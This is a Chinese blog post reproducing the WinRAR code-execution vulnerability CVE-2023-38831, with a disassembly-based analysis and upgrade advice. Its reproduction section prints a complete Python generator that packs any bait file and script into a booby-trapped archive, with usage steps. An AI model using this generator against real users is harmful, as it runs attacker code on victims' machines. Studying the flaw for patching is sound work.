【漏洞复现】RARLAB WinRAR 代码执行漏洞RCE (CVE-2023-38831)

刺骨的言语ヽ痛彻心扉 2024-03-08 08:45 143阅读 0赞

#### 文章目录 ####

*  前言
 *  声明
 *  一、漏洞描述
 *  二、影响版本
 *  三、漏洞分析
 *  四、漏洞复现
 *  五、修复建议

--------------------

## 前言 ##

WinRAR 是一款功能强大的压缩包管理器，它是档案工具RAR在 Windows环境下的图形界面。  
该软件可用于备份数据，缩减电子邮件附件的大小，解压缩从 Internet 上下载的RAR、ZIP及其它类型文件，并且可以新建 RAR 及 ZIP 格式等的压缩类文件。

从5.60版开始，WinRAR启用了新的图标，但用户仍可以通过官网提供的主题包换回原版风格的图标。

## 声明 ##

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

## 一、漏洞描述 ##

WinRAR是一款文件压缩器,该产品支持RAR、ZIP等格式文件的压缩和解压等。WinRAR在处理压缩包内同名的文件与文件夹时代码执行漏洞,攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件后,将在受害者机器上执行任意代码。

RARLabs WinRAR 6.23之前版本存在安全漏洞,攻击者利用该漏洞可以执行任意代码。

--------------------

## 二、影响版本 ##

*  WinRAR < 6.23

--------------------

## 三、漏洞分析 ##

**漏洞触发主要分成两个环节：**

1、点击诱饵文件时同名文件夹下的文件被释放  
2、执行文件时执行文件夹下的 .cmd文件而不是原文件

**释放文件**

用户点击文件后，winrar会遍历zip文件中的direntry，比较direntry->name 和点击文件名(click\_name)，比较函数(0047F790) 的第四个参数option为`0x80000006`，该函数会调用`00496020`，option作为第三个参数传入，`00496020`中会对 click\_name 和 entry\_name 进行字符串对比。  
![在这里插入图片描述][57315d27041e4fe2bfa4b91bb40e1792.png]  
由于传入的比较长度为 click\_name 的长度，类似 "CLASSIFIED\_DOCUMENTS.pdf " 和 "CLASSIFIED\_DOCUMENTS.pdf \\CLASSIFIED\_DOCUMENTS.pdf .cmd " 的比较会匹配，所以当`direntry`中存在与点击文件同名文件夹时，比较函数会返回1表示匹配，后续该entry对应的文件会连同点击文件一起被释放。  
![在这里插入图片描述][3d3e660eaee54f648c88f5ad39cd43d8.png]  
在修复版本623beta中，传入比较函数的option的值为`0x80000002`，该条件下比较函数会首先提取两个参数的目录名进行比较，则上面情况不再匹配。  
![在这里插入图片描述][4cbc2f852a9f4de48c5314c26afa4bd4.png]  
![在这里插入图片描述][132f178d943749d2aac920edbe5c7b98.png]  
option的值新版本设置flag进行控制，在创建临时目录成功后设置flag，并在解析过程中使用。  
![在这里插入图片描述][72d470c208254bb99afdf6d1cf4bd426.png]  
![在这里插入图片描述][32805173321c4ef0a6d2e0ec319aac38.png]  
![在这里插入图片描述][12d92e892dee4ae3ac5b79eaba0cd1f7.png]  
**文件执行**

以下面利用代码部分为例，在winrar展示窗口双击pdf文件后，winrar会使用函数ShellExecuteExW执行文件，这里传入的参数为：  
"C:\\Users\\`************`\\AppData\\Local\\Temp\\Rar$DIa`*****.*****`\\CLASSIFIED\_DOCUMENTS.pdf "  
![在这里插入图片描述][f9d4003a2df34e74bdfaf03c095229e2.png]  
由于上述bug的存在，临时文件夹下会释放以下两个文件：`CLASSIFIED_DOCUMENTS.pdf` 和 `CLASSIFIED_DOCUMENTS.pdf .cmd`

这两个文件的末尾空格都在函数4A26B0中被去除

![在这里插入图片描述][4cb7c579dc6d43c9a48c4b0d821c83dd.png]  
由于`ShellExecuteExW`参数最后有空格，它会执行第二个 .cmd文件，漏洞触发!!!  
![在这里插入图片描述][fe57c366c3a0498ca148a62273376139.png]

--------------------

## 四、漏洞复现 ##

本次复现环境如下

复现环境安装包：[点击下载][Link 1]  
![在这里插入图片描述][ed277df082a54ddfb8add81fd2c9440e.png]  
github脚本验证

项目地址: [CVE-2023-38831-winrar-exploit][]

利用代码如下(代码成分已标注)

import shutil
    import os, sys
    from os.path import join
    TEMPLATE_NAME = "TEMPLATE"
    OUTPUT_NAME = "CVE-2023-38831-poc.tar"
    # 模板文件夹的名称
    BAIT_NAME = "CLASSIFIED_DOCUMENTS.pdf"
    #诱饵文件
    SCRIPT_NAME = "script.bat"
    #脚本文件
    if len(sys.argv) > 3:
        BAIT_NAME = os.path.basename(sys.argv[1])
        SCRIPT_NAME = os.path.basename(sys.argv[2])
        OUTPUT_NAME = os.path.basename(sys.argv[3])
    elif len(sys.argv) == 2 and sys.argv[1] == "poc":
        pass
    else:
        print("""Usage:
              python .\cve-2023-38831-exp-gen.py poc
              python .\cve-2023-38831-exp-gen.py <BAIT_NAME> <SCRIPT_NAME> <OUTPUT_NAME>""")
        sys.exit()
    # 赋值 BAIT_NAME, SCRIPT_NAME 和 OUTPUT_NAME
    BAIT_EXT = b"." + bytes(BAIT_NAME.split(".")[-1], "utf-8")
    # 确定其扩展名，将 BAIT_NAME 按照最后一个"."进行分割，取最后一部分作为扩展名，并添加 b"." 前缀，得到 BAIT_EXT
    print("BAIT_NAME:", BAIT_NAME)
    print("SCRIPT_NAME:", SCRIPT_NAME)
    print("OUTPUT_NAME:", OUTPUT_NAME)
    
    if os.path.exists(TEMPLATE_NAME):
        shutil.rmtree(TEMPLATE_NAME)
    os.mkdir(TEMPLATE_NAME)
    d = join(TEMPLATE_NAME, BAIT_NAME + "A")
    if not os.path.exists(d):
        os.mkdir(d)
    
    shutil.copyfile(join(SCRIPT_NAME), join(d, BAIT_NAME+"A.cmd"))
    shutil.copyfile(join(BAIT_NAME), join(TEMPLATE_NAME, BAIT_NAME+"B"))
    
    # if os.path.exists(OUTPUT_NAME):
    #     print("!!! dir %s exists, delete it first" %(OUTPUT_NAME))
    #     sys.exit()
    
    shutil.make_archive(TEMPLATE_NAME, 'zip', TEMPLATE_NAME)
    
    with open(TEMPLATE_NAME + ".zip", "rb") as f:
        content = f.read()
        content = content.replace(BAIT_EXT + b"A", BAIT_EXT + b" ")
        content = content.replace(BAIT_EXT + b"B", BAIT_EXT + b" ")
    #改诱饵文件扩展名
    os.remove(TEMPLATE_NAME + ".zip")
    # 删除临时zip
    with open(OUTPUT_NAME, "wb")  as f:
        f.write(content)
    #写入文件
    print("ok..")

生成POC的两种方式  
python cve-2023-38831-exp-gen.py poc  
or  
python cve-2023-38831-exp-gen.py CLASSIFIED\_DOCUMENTS.pdf script.bat poc.rar

使用方法

1、将诱饵文件和（邪恶）脚本文件放置在当前目录下，诱饵文件建议为图片（.png、jpg）或文档（.pdf）
    2、运行python cve-2023-38831-exp-gen.py <bait name> <script name> <output name>以生成您的漏洞利用程序

![在这里插入图片描述][80f2daf00ca54001b030f7761ac20a1a.png]  
执行命令生成`exp.rar`,将压缩包打开双击运行\*\*\*\*\*.pdf文件  
最终执行Calc  
![在这里插入图片描述][10b2fb7228134d699d6972d9db7a5ac3.png]

--------------------

## 五、修复建议 ##

建议未及时进行更新的要尽快更新至最新版本 6.23，以免被恶意攻击。

[57315d27041e4fe2bfa4b91bb40e1792.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/08/b15a0e2244b945d78a0e06a3f0311550.png
[3d3e660eaee54f648c88f5ad39cd43d8.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/08/4e204d9a528c413db26117e4cf5bc9d7.png
[4cbc2f852a9f4de48c5314c26afa4bd4.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/08/2a09628f2f3c4e4e96e1d39b999043f7.png
[132f178d943749d2aac920edbe5c7b98.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/08/2ae08ee563394c48a72b065ad27105b2.png
[72d470c208254bb99afdf6d1cf4bd426.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/08/5ce44dc805494c16b9c45db27b1c519c.png
[32805173321c4ef0a6d2e0ec319aac38.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/08/ae2b7421065d4a4d888dd30b0fb47b17.png
[12d92e892dee4ae3ac5b79eaba0cd1f7.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/08/4cb5c1e9030a43d2b7e03fc1adcb0124.png
[f9d4003a2df34e74bdfaf03c095229e2.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/08/6dcbf3bf5aa74355a2e3ca7f499edc59.png
[4cb7c579dc6d43c9a48c4b0d821c83dd.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/08/219c36b4bfd54374b3d4338a6427d92a.png
[fe57c366c3a0498ca148a62273376139.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/08/fa86715dcba34203b6f5ce6247190bfc.png
[Link 1]: https://download.csdn.net/download/weixin_46944519/88326859
[ed277df082a54ddfb8add81fd2c9440e.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/08/f304e26b3ec245d1a68c3f10a0f9a94b.png
[CVE-2023-38831-winrar-exploit]: https://github.com/b1tg/CVE-2023-38831-winrar-exploit
[80f2daf00ca54001b030f7761ac20a1a.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/08/af526de665d6429d91968cef72c62b10.png
[10b2fb7228134d699d6972d9db7a5ac3.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/08/e6ced873dcb04ac983350d96f145fea8.png